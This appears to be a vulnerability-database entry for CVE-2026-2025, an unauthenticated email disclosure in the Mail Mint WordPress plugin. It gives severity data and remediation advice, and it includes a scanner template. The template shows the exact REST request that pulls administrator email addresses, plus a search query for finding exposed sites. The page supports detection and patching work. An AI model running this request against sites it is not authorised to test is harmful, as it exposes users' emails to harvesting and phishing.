/Vulnerability Library

Mail Mint < 1.19.5 - Unauthenticated Email Disclosure

CVE-2026-2025
Verified

Description

Mail Mint WordPress plugin < 1.19.5 contains an information disclosure vulnerability caused by lack of authorization in a REST API endpoint, letting unauthenticated users retrieve email addresses of blog users, exploit requires no authentication.

Severity

High

CVSS Score

7.5

Exploit Probability

1%

Affected Product

mail-mint

Published Date

March 16, 2026

Template Author

0x_akoko

CVE-2026-2025.yaml
id: CVE-2026-2025

info:
  name: Mail Mint < 1.19.5 - Unauthenticated Email Disclosure
  author: 0x_Akoko
  severity: high
  description: |
    Mail Mint WordPress plugin < 1.19.5 contains an information disclosure vulnerability caused by lack of authorization in a REST API endpoint, letting unauthenticated users retrieve email addresses of blog users, exploit requires no authentication.
  impact: |
    Unauthenticated attackers can retrieve email addresses of users, leading to privacy breaches and potential phishing attacks.
  remediation: |
    Update to version 1.19.5 or later.
  reference:
    - https://wpscan.com/vulnerability/1b815cde-cd9d-46fa-a6ab-3d2851705e7b/
    - https://nvd.nist.gov/vuln/detail/CVE-2026-2025
    - https://wordpress.org/plugins/mail-mint/
  classification:
    cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N
    cvss-score: 7.5
    cve-id: CVE-2026-2025
    epss-score: 0.01379
    epss-percentile: 0.68789
    cwe-id: CWE-200
  metadata:
    verified: true
    max-request: 1
    vendor: mail-mint
    product: mail-mint
    fofa-query: body="/wp-content/plugins/mail-mint/"
  tags: cve,cve2026,wordpress,wp-plugin,mail-mint,exposure,unauth,vuln,vkev

http:
  - method: GET
    path:
      - "{{BaseURL}}/wp-json/mrm/v1/wp/admins?term=@"

    matchers:
      - type: dsl
        dsl:
          - 'status_code == 200'
          - 'contains(content_type, "application/json")'
          - 'contains_all(body, "\"admins\"", "\"label\"", "@")'
        condition: and
# digest: 4a0a00473045022100f954974627bbf86f76f26eec67dc09aa88ba3d92108fbee560c09511070db6a9022052d22cc9374edbb5851fc8e1248d1642b7255cfc212f7679806085423cb17fc9:922c64590222798bb761d5b6d8e72950
7.5Score

CVSS Metrics

CVSS Vector:
CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N
CVE ID:
cve-2026-2025
CWE ID:
cwe-200

References

https://wpscan.com/vulnerability/1b815cde-cd9d-46fa-a6ab-3d2851705e7b/https://nvd.nist.gov/vuln/detail/CVE-2026-2025https://wordpress.org/plugins/mail-mint/

Remediation Steps

Update to version 1.19.5 or later.